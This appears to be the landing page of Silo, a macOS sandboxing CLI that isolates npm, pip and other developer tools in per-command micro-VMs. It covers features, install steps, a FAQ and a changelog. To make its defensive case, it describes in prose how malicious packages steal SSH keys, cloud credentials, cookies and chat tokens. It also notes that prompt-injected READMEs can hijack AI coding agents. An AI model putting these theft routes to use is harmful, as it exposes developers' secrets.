Run dev tools.
Not risks.
Silo wraps every tool invocation in a fresh Apple Containerization
micro-VM with its own Linux kernel. npm install can't
exfiltrate your SSH keys. pip can't read your cloud
credentials. And it feels native — ~600 ms warm start
(rootfs cache hit).
Your dev tools run a lot of code you never read.
A single npm install might execute thousands of
postinstall scripts from hundreds of maintainers. Your
machine trusts all of them by default. One malicious release — and
you've shipped your life to a Discord webhook.
SSH keys
~/.ssh/id_ed25519, known_hosts, agent sockets — readable by any process you run. A four-line postinstall exfils every server you touch.
Cloud credentials
~/.aws/credentials, gcloud tokens, kubeconfig. Stolen credentials turn into crypto miners on your company's account by breakfast.
Browser cookies
Chrome and Safari cookie jars are just files. Session cookies let attackers skip your 2FA entirely — on GitHub, Gmail, banking, anything.
Slack & Discord tokens
Desktop chat apps keep tokens on disk in predictable paths. Impersonation in your company Slack is a ten-line script away.
Source code
Every private repo, every draft, every half-finished side project. Tarball ~/code to a remote host — done in seconds.
Your keychain
Once a malicious binary runs under your user, it can prompt for keychain access with your own app's name. You'll click yes. We all would.
AI agent blast radius
Claude Code, Cursor, and friends read your tree and run shell commands. A prompt-injected README is game over. Same access as you.
Other projects
Lateral movement doesn't need privilege escalation. Your dev laptop has every client's code on one disk, under one UID.
Python venvs, Node's nvm, and even pipx isolate dependencies —
not permissions. Everything still runs as you, with your full filesystem,
on your kernel.
One process → one micro‑VM. Real kernel boundary.
Built on Apple Containerization
macOS 26 shipped a native Containerization.framework that
boots stripped-down Linux VMs in the low hundreds of milliseconds.
Silo is a thin CLI on top of it: when you run a tool, it spins
up a one-shot VM, mounts only the files you asked for, runs your
command, streams output to your terminal, and evaporates.
Feels native, isn't
Silo installs shims for python, node, cargo, go, deno —
so typing python app.py transparently runs inside a VM.
No ceremony, no exec, no container runtime glued to
your shell.
Explicit, not magic
Every non-default exposure — network egress, host files,
forwarded ports — is an explicit key in .siloconf,
checked in with the repo. Reviewed once, reused forever.
The CLI is small on purpose.
silo <tool> shorthand and via ~/.silo/bin shims.package.json, requirements.txt, Cargo.toml, go.mod) and generate a .siloconf.silo build node -- npm install. Survives every future run.~/.silo/bin shims so extra commands route through silo — yarn, pnpm, ipython, anything..siloconf: install missing tools, warm the rootfs cache. Safe to re-run.~/.silo disk use, LRU-evict cold rootfs entries, zstd-compress stale ones, or wipe everything..siloconf overrides.Silo vs. the tools you already use.
| silo | docker desktop | venv / nvm | native | |
|---|---|---|---|---|
| Kernel isolation | ✓ real (new kernel) | × shared linuxkit | × none | × none |
| Filesystem scoping | ✓ cwd only, by default | partial (volumes) | × full $HOME | × full $HOME |
| Network deny-by-default | ✓ per-project allowlist | × bridge wide open | × same as host | × same as host |
| Cold start | ~600 ms | 2–8 s + daemon | instant | instant |
| Memory overhead | ~80 MB per VM | 1–4 GB persistent | none | none |
| Transparent shims | ✓ python/node/cargo/go | × explicit docker run | partial (per-tool) | n/a |
| Background daemon? | ✓ none | × required | none | none |
Docker is container orchestration that happens to offer isolation. Silo is isolation that happens to use a container. Different goals; they coexist fine.
Three lines to sandboxed.
# 1. install silo (the user/tap/formula triple dodges homebrew-cask's silo) $ brew install rchekalov/silo/silo # 2. put silo shims on your PATH via shellenv (same convention as brew) $ echo 'eval "$(silo shellenv)"' >> ~/.zshrc # 3. install a tool (first run bootstraps kernel + initfs; ~5 min once, seconds after) $ silo install python # python is now sandboxed: $ python suspicious_script.py # one silo install per tool you need: $ silo install node # adds npm, npx shims $ silo install claude-code # adds claude shim # network is off by default. opt in per-tool via .siloconf: $ silo init # auto-detects tools + writes an allowlist stub
Requires macOS 26+ on Apple Silicon. The Homebrew formula installs a
codesigned binary with com.apple.security.virtualization
entitlements — everything is handled for you. See the
quickstart for .siloconf and
opt-in network rules.
Fast enough you'll forget it's there.
measured on M2 Pro · macOS 26.1 · silo 0.4.0 · your results will vary
The questions you're about to ask.
Is this just Docker with a nicer CLI?
No. Docker orchestrates containers — namespaced processes sharing the host kernel. Silo uses Apple Containerization, which boots a real Linux VM per container with its own kernel. That's the difference between "shared kernel, fences between processes" and "separate kernel, hypervisor boundary." Different goals; they coexist fine.
Why only Apple Silicon?
Apple Containerization framework (macOS 26+) is the piece that makes sub-second VM starts possible on macOS. It needs Apple Silicon. A Docker backend for Linux users is on the roadmap — on Linux, native namespaces give you most of what Silo gives you on macOS.
Do I lose editor integration? LSPs?
No. silo lsp <tool> runs the language server (pyright, tsserver, rust-analyzer, gopls) inside the VM and proxies JSON-RPC over stdio with automatic path rewriting. silo ide vscode|zed|neovim generates editor configs that point at the proxied server. Autocomplete and go-to-definition work; code analysis stays isolated.
How do I give a project network access?
Add a .siloconf with an allowlist. The VM has no network by default. Flip hostAccess: true and list the domains each tool is allowed to reach — registry.npmjs.org, pypi.org, *.github.com, your private registry. Everything else is blocked by an in-VM HTTP proxy.
What about files outside my cwd?
They don't exist. The VM only mounts the directory walk-up finds the .siloconf in (or the cwd, if none). ~/.ssh, ~/.aws, other projects — none of it is visible. That's the whole point: a compromised package literally cannot open a file that isn't there.
Does `npm install` / `pip install` work out of the box?
Not quite — and that's deliberate. The VM has no network until you allowlist a registry. Run silo init and it writes a sensible .siloconf stub (pypi.org for Python, registry.npmjs.org for Node, etc.) you can edit from there. Without that one file, package managers fail fast — which is the feature.
Can I use it in CI?
Silo is macOS-only today (Apple Silicon + macOS 26+), so CI works if your runners are macOS. A prebuilt-image workflow that ships ready-to-boot rootfs artifacts from GitHub Actions is planned — see docs/ci-prebuilt-images.md in the repo. For Linux CI, use a normal container.
What persists between runs?
Your project directory (mounted read-write), the rootfs cache (so warm starts are ~600 ms), and per-tool package caches (pip, npm, cargo). Everything else is ephemeral. If you want packages installed via pip or npm to survive, either keep them inside the project (venv, node_modules) or use silo build to bake them into the rootfs.
Is Silo free?
Yes. Apache 2.0. It's a personal project, not a product. The CLI wraps Apple's Containerization framework (also open-source) — there's no paid tier, no telemetry, no account.
What shipped, when.
CLI reshape, Go-only, disk reduction.
- One verb per job:
silo buildabsorbssetup/rebuild,silo syncabsorbspull/apply,statussplits intodoctor+current. - Rust implementation removed; Go is now the sole binary.
- Disk reclaim: LRU + age-based rootfs GC, zstd cold-tier compression (~4× smaller), image deletion on uninstall.
- Two-phase SIGINT handler; reaper for stale
silo-*container dirs.
Project config.
.siloconfwalk-up with project-overrides-global merge; per-tool env, network allowlists, port forwarding.silo use/silo unusefor pyenv-style project pins.silo initauto-detects tools from marker files.
Transparent shims.
- Shell shims for
python,node,cargo,rustc. Editor-friendly (LSPs work). - Kernel image split from binary —
silo installfetches it on demand. - Fixed a deadlock when stdout was a pipe and the tool wrote > 64 KB.
Hello world.
- Initial release.
silo runworks for Python, Node, and bash. - macOS 26+, Apple Silicon only.
Short reads to get real work done.
Understanding .siloconf: where it lives, how it merges, what every field does
A complete reference for Silo's project config file — what belongs in it, what belongs in ~/.silo/siloconf, and the full set of fields with worked examples.
Node.js with Silo: npm, yarn, pnpm, and version pinning
Running Node under Silo — persisting node_modules with silo build, switching Node versions per project, and wiring yarn / pnpm via corepack or custom shims.
Python with Silo: install, persist, pin versions
Everything you need to run Python under Silo — installing pip packages so they survive, switching versions per project, and configuring network access for PyPI.
Silo v0.4.0 release notes
The CLI is reshaped around one-model-per-command, the Rust implementation is gone, and disk reclamation now runs automatically. Smaller surface, fewer footguns.
How Silo works
A tour of the stack: a Go CLI, a Swift FFI bridge, Apple's Containerization framework, and a rootfs cache that clones in a millisecond on APFS.
Getting started with Silo in three commands
Install silo from the Homebrew tap, add its shims to your PATH, and install your first sandboxed tool. Total setup time: one coffee's worth.